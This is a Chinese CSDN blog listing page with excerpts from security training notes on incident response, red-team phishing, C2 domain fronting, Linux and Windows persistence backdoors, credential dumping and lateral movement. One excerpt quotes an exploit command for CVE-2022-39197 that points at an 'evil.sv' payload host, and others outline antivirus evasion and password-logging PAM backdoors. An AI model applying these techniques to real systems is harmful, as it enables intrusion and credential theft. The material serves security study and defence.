今天是几号的博客_CSDN博客-Cyber-Security,内网渗透,权限提升领域博主

原创小迪安全培训2023期笔记汇总-持续更新

基础入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA。基础入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断。信息打点-Web应用&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份。基础入门-ChatGPT篇&注册体验&结合安全&融入技术&高效赋能&拓展需求。信息打点-Web应用&企业产权&指纹识别&域名资产&网络空间&威胁情报。

2023-03-03 17:45:31 1356 8

原创【溯源反制】CDN&域前置&云函数-流量分析|溯源

1、不备案的域名+禁用不必要的域名解析记录(防止被溯源收集到更多信息)2、使用HTTPS通讯3、C2服务器混淆基础特征-修改profile配置文件，修改ssl证书4、CS服务端防火墙做策略，仅允许目标主机网段连接，防止其他网段主机对其进行扫描，防溯源5、加跳板、代理等，当然最重要的是免杀了……

2023-05-12 12:42:35 341 2

原创蓝队中级面试(某蓝某达某中介合集)

近期面试了几家蓝队中级岗位(公司内面)，在此做出相关面试题整理及面试总结。

2023-05-09 22:05:33 214

原创【应急响应】日志自动提取分析项目&ELK&Logkit&LogonTracer&Anolog等

1、七牛Logkit：(Windows&Linux&Mac等)支持的数据源（各类日志，各个系统，各个应用等）File: 读取文件中的日志数据，包括csv格式的文件，kafka-rest日志文件，nginx日志文件等,并支持以grok的方式解析日志。2、观星应急工具：（Windows系统日志）SglabIr_Collector是qax旗下的一款应急响应日志收集工具，能够快速收集服务器日志，并自动打包，将收集的文件上传观心平台即可自动分析。

2023-05-03 16:19:04 795

原创【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复

某公司运维人员小李近期发现，通过搜索引擎访问该公司网站会自动跳转到恶意网站（博彩网站），但是直接输入域名访问该公司网站，则不会出现跳转问题，而且服务器CPU的使用率异常高，运维人员认为该公司服务器可能被黑客入侵了，现小李向XX安全公司求助，解决网站跳转问题。某天客户反馈：服务器疑似被入侵，风扇噪声很大，实验室因耗电量太大经常跳闸，服务器疑似被挖矿。挖矿程序定位定性，时间分析，排查安全漏洞，攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了，属于是)危害：CPU拉满，网络阻塞，服务器卡顿、耗电等。

2023-04-25 12:38:37 439

原创【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux

主机层面后门&Web层面后门&权限维持类后门。主机层面后门&Web层面后门&权限维持类后门# Windows实验1、常规MSF后门-分析检测2、权限维持后门-分析检测3、Web程序内存马-分析检测常见工具集合：

2023-04-24 18:16:53 400

原创【面试】记一次HVV蓝队中级(面试题)

动态免杀方面需要补一下、应急响应方面知识没有构成系统，讲的有点乱。@[TOC](文章目录)# 使用过安全设备吗？使用过程中发现过真实攻击行为吗？# SRC经验# 网络攻防CTF经历# Web OWasp Top10# 常见webshell特征(内存马特征)# Goby在用什么版本?(这是没想到的)# Sqlmap参数# Burpsuite常用插件# MSF生成木马命令行(msfvenom 这问题也是我没想到的)# 动态免杀(这里要补一下了，不太熟悉)# mimikaze使用

2023-04-23 20:10:55 533

原创【应急响应】拒绝服务&钓鱼指南&DDOS压力测试&邮件反制分析&应用日志

红队APT钓鱼邮件内容分析(邮件源代码发送方IP、X-Mailer、钓鱼工具Gophish、指纹特征等)3、根据域名寻找邮件服务器地址(利用红队手段渗透获取信息)1、协议口令爆破事件(以SQLserver、RDP为例)了解：数据库日志，系统日志，中间件日志，其他应用日志等。2、口令传递横向事件(演示域内横向移动日志记录)防御手段：CC防火墙，CDN服务，高防服务等。2、看发送IP地址（服务器IP或攻击IP）1、看发信人地址(邮件代发、相似域名)1、看指纹信息（什么发送工具平台）

2023-04-23 12:49:18 361

原创【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

影响：Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本。导致在宏被禁用的情况下，恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件，经过免杀后的exe程序(xgpj.exe)，进行重命名，在gpl位置插入Unicode控制字符，RLO(从左到右覆盖)，如图。6、取出文档执行测试。

2023-04-22 19:34:31 423

原创【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具

CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼蜜罐反制。前面准备工作都是一气呵成，这里有个一很坑的地方就是使用pip安装Frida module时，一开始安装总是报错(tiemout以及各种问题)，然后我不停的换Pytthon版本emmm，最后解决是使用超级管理员权限运行cmd就好了(心中无数个？)```bashpython cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv

2023-04-20 19:31:19 326

原创应急响应-战后溯源反制&社会工程学&IP&ID追踪&URL反查&攻击画像

(4) 微博搜索（如果发现有微博记录，可使用tg查询weibo泄露数据）(7) 豆瓣/贴吧/知乎/脉脉你能知道的所有社交平台，进行信息收集。在社交平台上查找，（微信/微博/linkedin/twitter）(5) 微信ID收集：微信进行ID搜索（直接发钉钉群一起查）2、微信搜索 -> 微信ID可能是攻击者的ID，甚至照片。如后门的密码，源码中的注释，反编译分析的特殊字符串等。技术博客（csdn，博客园），src平台（补天）这是昨天的域前置后门(只是做了域前置，未做免杀)

2023-04-19 19:00:28 251

原创【红队APT】反朔源隐藏&C2项目&CDN域前置&云函数&数据中转&DNS转发

区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装，效果要更上一层楼！可以看到这里正常上线，也是简单的进行流量代理，这里我把上面的iptables转发配置清空了，避免干扰注：如果中转服务器被拿下的话，那么搜集信息很可能就可以发现请求重定向的痕迹，从而找到真实C2地址。请求重定向也可以和之前的CDN方法相结合，之前CDN方法是通过CDN将请求转发到真实的C2服务器上，而添加请求重定向后，流程就变为了CDN转发到中转服务器，中转服务器再转到C2，达到双重隐藏的效果。

2023-04-19 12:38:32 262

原创【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置

生成后在虚拟机中上线，不过遇到了奇怪的事情就是，我在上线的虚拟机中抓不到http流量的数据包，而在物理机中抓到了(emmm我也不太懂为什么会这样)红队进行权限控制，主机开始限制出网，尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常，尝试修改工具指纹特征加密流量防止检测，结果被定位到控制服务器，这里可以看到msf自带的证书，这里我们对该证书进行伪装(这里其实流量上没做什么改变，知识对默认证书指纹做了修改)这里可以看到，流量进行了加密，只能隐约的看到一些ssl证书信息。

2023-04-18 16:15:00 417

原创【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务

alias命令的功能：为命令设置别名定义：alias ls = ‘ls -al’删除：unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线，不过ls命令会被阻塞在那里，很容易引起怀疑，当结束终端窗口时，反弹shell的会话也会随着被终结，而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级：))";alerts’进行base64编码是因为python程序有空行和空格，将一段命令转换成单行命令。

2023-04-16 22:31:04 342

原创【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录

可以找到以读写方式记录在文件中的SSH后门密码文件的位置，并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务，然后加载相应的PAM的配置文件(位于/etc/pam.d)，最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换，即使用万能密码登陆，将用户名密码记录到文件中。

2023-04-16 11:32:00 462

原创【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

配合powershell payload(需免杀)实现无文件落地。系统自带的辅助功能进行替换执行，放大镜，旁白，屏幕键盘等均可。1、WinLogon配合无文件落地上线(切换用户登录就会上线)远程连接时，连按五下shift键可以打开粘滞键。将后门放置该目录，服务器重启即上线。测试：执行notepad成cmd。-服务器键值（需要管理员权限）2、屏幕保护生效后执行后门。3、自启动注册表加载。

2023-04-15 17:43:42 559

原创 WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知

使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)# ==冰蝎3-流量&绕过&特征&检测== **面试必问的，别问我怎么知道的**冰蝎利用了服务器端的脚本语言加密功能，通讯的过程中，消息体内容采用 AES 加密，基于特征值检测的安全产品无法查出## 特征密钥使用连接密码的md5结果的前16位如果对方使用的默认密码rebeyond，那么密钥就是e45e329feb5d925b，那么这也算是一个特征

2023-04-12 22:12:22 605

原创 Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现

Apache log4j是Apache的一个开源项目，Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞，当程序记录用户输入的数据时，即可触发该漏洞。影响范围Apache Log4j 2.x

2023-04-12 10:55:06 536

原创 WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参

# 基础-脚本后门控制原理-代码解释对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等# 原理-脚本后门查杀机制-函数&行为对比WAF规则-函数匹配&工具指纹等# 代码-脚本后门免杀变异-覆盖&传参

2023-04-10 21:44:14 284

原创 WAF攻防-信息收集&识别&被动探针&代理池&仿指纹&白名单

3、白名单：模拟白名单模拟WAF授权测试，解决速度及测试拦截。4、模拟用户：模拟真实用户数据包请求探针，解决WAF指纹识别。2、代理池：在确保速度的情况下解决请求过快封IP的拦截。Xray-配置修改&进程转发 Proxifier。#信息收集-目录扫描-Python代理加载脚本。3、脚本或工具的检测Payload。1、延迟：解决请求过快封IP的情况。Goby-配置加入Socket代理。Awvs-设置速度&加入代理。2、脚本或工具的指纹被识别。1、脚本或工具速度流量快。

2023-04-10 21:10:15 251

原创【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP

第⼀次拿到域管权限之后，需要将krbtgt NTLM hash进⾏保存，当第⼆次再来进⾏域渗透攻击时，我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据，从⽽再次获得域管权限。工具原理：添加用户时在用户名上添加$符号，将该用户的用户组设置为空(单主机环境为空，域环境为administrator组)，导致无法删除(在注册表中也可以进行隐藏)2、域的SID值：S-1-5-21-1218902331-2157346161-1782232778。sid：域环境下的SID，除去最后-的部分剩下的内容。

2023-04-10 10:18:02 300

原创【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙

攻防实战中，靶机很难会重启，攻击者重启的话风险过大，因此可以在靶机上把两个方法相互结合起来使用效果比较好，尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。DSRM（Diretcory Service Restore Mode，目录服务恢复模式）是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户，DSRM密码是在DC创建时设置的，一般很少更改。DSRM的用途是：允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。

2023-04-09 14:58:53 489

原创【内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取

微软为了防止明文密码泄露发布了补丁KB2871997，关闭了Wdigest功能。当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，此时可以通过修改注册表的方式抓取明文，但需要用户重新登录后才能成功抓取。2008 R2版本可以抓取明文密码2012 R2 Datacenter 版本抓不到密钥mimikatz被拦截(杀毒等)：进行离线读取操作系统过高 => 2012：离线读取、修改注册表、对hash值进行破解利用RDP凭据mimipenguin 读取。

2023-04-08 16:59:32 617

原创【面试】记一次安恒面试及总结

面试整体围绕简历上内容来提问，因为实习岗所以问的难度比较浅，但是范围还是蛮广的，通过面试来检测自己当前学习的状况还是挺不错的。

2023-04-07 14:54:16 730 1

原创【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全

Exchange，LLMNR投毒，NTLM-Relay,Kerberos_TGS，GPO&DACL，域控提权漏洞，约束委派，数据库攻防，系统补丁下发执行，EDR定向下发执行等。strict_chain：如果下方设置了多个节点，必须都测试正确才可以使用。dynamic_chain：下方代理节点有一条测试正确也可以使用。172.16.250.30 8080开放 jenkins服务。成功解密后密码为：)uDvra{4UL^;172.16.250.30 8080开放。172.16.250.10 80开放。

2023-04-07 12:43:34 126

原创【内网安全】横向移动-域渗透之资源约束委派

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能，与传统的约束委派相比，它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身，既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时，加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。

2023-04-06 11:51:04 284

原创【内网安全】横向移动&非约束委派&约束委派&资源约束委派&数据库攻防

由于非约束委派的不安全性，微软在windows server 2003中引入了约束委派，对Kerberos协议进行了拓展，总的来说，如果需要在Windows环境中使用委派功能，建议使用约束委派而不是非约束委派，以提高系统和数据的安全性。攻击者拿到了一台配置非约束委派的机器权限，可以诱导域管来访问该机器，然后得到管理员的TGT，从而模拟域管用户。机器A（域控）访问具有非约束委派权限的机器B的服务，会把当前认证用户（域管用户）的的TGT放在ST票据中，

2023-04-05 19:51:35 417

原创解决ping命令无法使用-环境变量优先级问题

由于复现各种漏洞的需要，搭建不同环境需要Python的版本也不同，于是在环境变量里来回捣置，哪知道复现结束了原来的系统配置忘记恢复，使用ping后莫名其妙的打开了Pycharm，自动生成了ping.py文件这里显示ping.exe路径是存在的，只不过是优先级被前面的变量覆盖了，当输入ping时，直接按照py文件进行处理了(可能输入其他命令也是这种情况)，而我的电脑中py文件默认打开程序就是Pycharm，所以就出现了这种情况上移至顶端就可以正常使用了当然如果还是不成功的话，可以看一看用

2023-04-05 18:35:50 72

原创信息打点-APP资产&知识产权&应用监控&静态提取&动态抓包&动态调试

通过获取App配置、数据包，去获取url、api、osskey、js等敏感信息。2、泄露信息-配置key 资源文件 - key（osskey利用，邮件配置等）案例：某APP打开无数据包，登录有数据包（反编译后未找到目标资产，抓包住到了）1、资产信息-IP 域名网站 -转到对应Web测试接口测试服务测试。3、代码信息-java代码安全问题- 逆向相关。2、提取-静态表现&动态调试。3、动态调试从表现中提取数据。2、反编译从源码中提取数据。1、抓包抓表现出来的数据。2、网站上有APP下载。

2023-04-04 12:10:25 273

原创【vulhub靶场】GoldenEye

pwd=90lq靶机：10.10.10.155关于复现，我把所有的试错过程也直接写上出了，尽管对于最终获得flag步骤有点多余TTY 是一个缩写，代表着 Teletype，它是一种早期的文字终端设备。在计算机早期，TTY是用于与计算机交互的主要方式之一，用户可以通过键盘输入指令并在屏幕上看到计算机的响应。如今，TTY通常被用来描述一个连接到终端设备的进程或会话。TTY 可以在本地终端、SSH 连接、串口连接等各种情况下使用，

2023-04-04 10:50:20 435

原创【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

当Windows系统的Active Directory证书服务（CS）在域上运行时，由于机器账号中的dNSHostName属性不具有唯一性，域中普通用户可以将其更改为高权限的域控机器账号属性，然后从Active Directory证书服务中获取域控机器账户的证书，导致域中普通用户权限提升为域管理员权限。

2023-04-02 11:39:24 356

原创【内网安全】横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

攻击者伪造一个恶意的SMB服务器，当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时， smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ，然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange，LLMNR投毒，

2023-04-02 11:16:42 328

原创 phpstudy小皮Windows面板RCE漏洞

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞，通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。

2023-04-01 10:25:30 247

原创信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等

后端CMS：一般PHP开发居多源码程序（利用源码程序名去搜漏洞情况，源码去下载进行后期的代码审计）前端js 框架（爬取更多的js从里面筛选URL或敏感泄漏key等）也是可以通过对js代码逻辑进行代码审计组件java居多，第三方的功能模块（日志记录，数据监控，数据转换等）常见有过安全漏洞组件（shiro solr log4j sprintboot等）框架php java python都有简单代码的一个整合库，如果使用框架就只需要学习使用框架调用即可。

2023-03-31 12:46:34 177

原创【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破

Exchange Server 是微软公司的一套电子邮件服务组件，是个消息与协作系统。简单而言，Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱，但是国内微软并不直接出售Exchange邮箱，而是将Exchange、Lync、Sharepoint三款产品包装成Office365出售。实验靶场环境：0day.org单域环境Win7 x64 0day.org PC-Jack 访问域主机地址。

2023-03-30 15:16:59 228

原创信息打点-CDN绕过&业务部署&漏洞回链&接口探针&全网扫描&反向邮件

全网扫描：https://github.com/Pluto-123/Bypass_cdn。全网扫描：https://github.com/boy-hack/w8fuckcdn。接口查询：https://fofa.info/extensions/source。接口查询：https://fofa.info/extensions/source。全网扫描：https://github.com/Tai7sy/fuckcdn。国外请求：https://boce.aliyun.com/detect/

2023-03-30 09:44:14 359

原创信息打点-主机架构&蜜罐识别&WAF识别&端口扫描&协议识别&服务安全

利用国际上公认的一种说法：Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。根据蜜罐与攻击者之间进行的交互的程度可以将蜜罐分为三类:低交互蜜罐、中交互蜜罐、高交互蜜罐。当然还可以根据蜜罐模拟的目标进行分类，比如：数据库蜜罐、工控蜜罐、物联网蜜罐、Web蜜罐等等。使用参考： https://blog.csdn.net/qq_53079406/article/details/125266331。云WAF：百度安全宝、阿里云盾、长亭雷池，华为云，亚马逊云等。

2023-03-29 21:29:02 557

原创【内网安全】横向移动&Kerberos攻击&SPN扫描&WinRM&WinRS&RDP

请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5，这意味着服务帐户的NTLM密码哈希用于加密服务票证。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。•服务票据的暴力破解(使用密码字典进行RC4协议破解)cs 内置端口扫描3389。

2023-03-29 17:23:26 369

原创 MinIO信息泄露漏洞(CVE-2023-28432)批量检测POC

MinIO 是一种开源对象存储服务，与 Amazon S3 API 兼容，可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统，可以存储大量数据，并提供高速的数据读写能力。MinIO采用分布式架构，可以在多个节点上运行，实现数据的分布式存储和处理。在集群部署的Minio中，未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息（MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD），可能导致攻击者以管理员权限登录Minio。

2023-03-28 18:27:23 5820 4

原创信息打点-JS架构&框架识别&泄漏提取&API接口枚举&FUZZ爬虫&插件项目

在Javascript中也存在变量和函数，当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP，JAVA,NET等区别在于即没有源代码，也可以通过浏览器的查看源代码获取真实的点。获取URL，获取JS敏感信息，获取代码传参等，所以相当于JS开发的WEB应用属于白盒测试（默认有源码参考），一般会在JS中寻找更多的URL地址，在JS代码逻辑（加密算法，APIkey配置，验证逻辑等）进行后期安全测试。前提：Web应用可以采用后端或前端语言开发。

2023-03-27 23:40:03 460

空空如也

空空如也